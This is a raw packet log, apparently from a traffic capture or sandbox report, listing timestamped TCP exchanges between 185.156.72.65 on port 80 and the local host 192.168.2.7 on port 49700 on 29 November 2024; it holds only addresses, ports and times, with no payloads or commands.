Nov 29, 2024 19:50:38.282480955 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.282527924 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.282558918 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.282603979 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.283370972 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.283413887 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.283415079 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.283502102 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.284236908 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.284296036 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.284317017 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.284363031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.285109043 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.285166025 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.285248995 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.285294056 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.341312885 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.341428041 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.341429949 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.341486931 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.341804981 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.341855049 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.341908932 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.342653036 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.342694044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.342710018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.342752934 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.343569040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.343628883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.343647003 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.343688011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.344377041 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.344459057 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.344521046 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.345257044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.345268011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.345321894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.346096992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.346173048 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.346210957 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.346254110 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.346976042 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.347050905 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.347134113 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.347183943 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.347871065 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.347963095 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.347964048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.348057985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.348704100 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.348754883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.348840952 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.349025011 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.349600077 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.349742889 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.349818945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.349864960 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.350455999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.350523949 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.350549936 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.350600958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.351330042 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.351423025 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.351473093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.352231026 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.352257967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.352298021 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.352324963 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.353143930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.353178024 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.353249073 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.353943110 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.354068995 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.354135990 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.354819059 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.354882002 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.354927063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.354970932 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.355681896 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.355695009 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.355763912 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.356544018 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.356595039 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.356672049 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.356714964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.357481956 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.357549906 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.357584000 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.357635021 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.358238935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.358314991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.358347893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.358387947 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.359155893 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.359230042 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.359234095 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.359272957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.360049963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.360130072 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.360196114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.360265970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.360954046 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.361032963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.361033916 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.361073971 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.361732960 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.361803055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.361845016 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.361886978 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.362780094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.362793922 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.362854958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.363519907 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.363590002 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.363688946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.363748074 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.364315033 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.364437103 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.364449978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.364528894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.364809036 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.364866972 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.364875078 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.364921093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.365484953 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.365597010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.365701914 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.365751028 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.366488934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.366499901 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.366569042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.467538118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.467812061 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.467900038 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.467955112 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.468002081 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.468087912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.468135118 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.468842030 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.468913078 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.468945026 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.468991995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.469659090 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.469959974 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.470040083 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.470056057 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.470101118 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.470817089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.470880985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.470917940 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.470957994 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.471757889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.471770048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.471824884 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.472588062 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.472706079 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.472776890 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.473464966 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.473530054 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.473598003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.474339962 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.474396944 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.474411011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.474457979 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.475298882 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.475352049 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.475433111 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.475475073 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.476115942 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.476166964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.476214886 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.476263046 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.476984978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.477044106 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.477077007 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.477127075 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.477811098 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.477843046 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.477885008 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.477910042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.478655100 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.478740931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.478754997 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.478804111 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.479496002 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.479578018 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.479604959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.479655981 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.480355024 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.480413914 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.480458021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.480503082 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.481247902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.481298923 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.481324911 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.481365919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.482090950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.482156038 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.482280016 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.482991934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.483047962 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.483103991 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.483217001 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.483880997 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.483935118 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.483974934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.484023094 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.484718084 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.484777927 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.484785080 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.484855890 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.485573053 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.485681057 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.485738993 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.486458063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.486541033 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.486601114 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.542601109 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.542731047 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.542774916 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.542812109 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.543045044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.543148041 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.543181896 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.543200970 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.543903112 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.543971062 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.544235945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.544302940 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.544338942 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.544441938 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.545084000 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.545146942 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.545207024 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.545258045 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.545964003 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.546029091 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.546053886 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.546080112 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.546837091 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.546900034 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.546904087 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.546953917 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.547760963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.547831059 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.547872066 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.547914982 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.548571110 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.548634052 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.548671961 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.548722029 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.549458981 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.549515009 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.549523115 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.549559116 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.550293922 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.550348043 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.550494909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.550542116 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.551177979 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.551234007 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.551285028 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.551335096 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.552031040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.552088976 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.552113056 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.552155972 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.552979946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.553026915 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.553090096 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.553132057 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.553765059 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.553812027 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.553852081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.553894997 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.554677963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.554719925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.554744959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.554788113 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.555499077 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.555541039 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.555615902 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.555710077 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.556391954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.556436062 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.556456089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.556499958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.557318926 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.557332993 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.557365894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.557382107 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.558171988 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.558185101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.558222055 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.559230089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.559242964 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.559278965 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.559859037 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.559906006 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.560034037 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.560065031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.560749054 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.560784101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.560805082 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.560827017 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.561631918 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.561728001 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.561770916 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.562494040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.562532902 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.562594891 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.562633038 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.563342094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.563390017 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.563406944 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.563446999 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.564196110 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.564249039 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.564280987 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.564321041 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.565159082 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.565221071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.565433025 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.565443993 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.565475941 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.565519094 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.565718889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.565829039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.565872908 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.566565037 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.566636086 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.566667080 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.566708088 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.567486048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.567528963 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.567603111 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.668872118 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.668940067 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:38.669101000 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:38.669312954 CET	80	49700	185.156.72.65	192.168.2.7
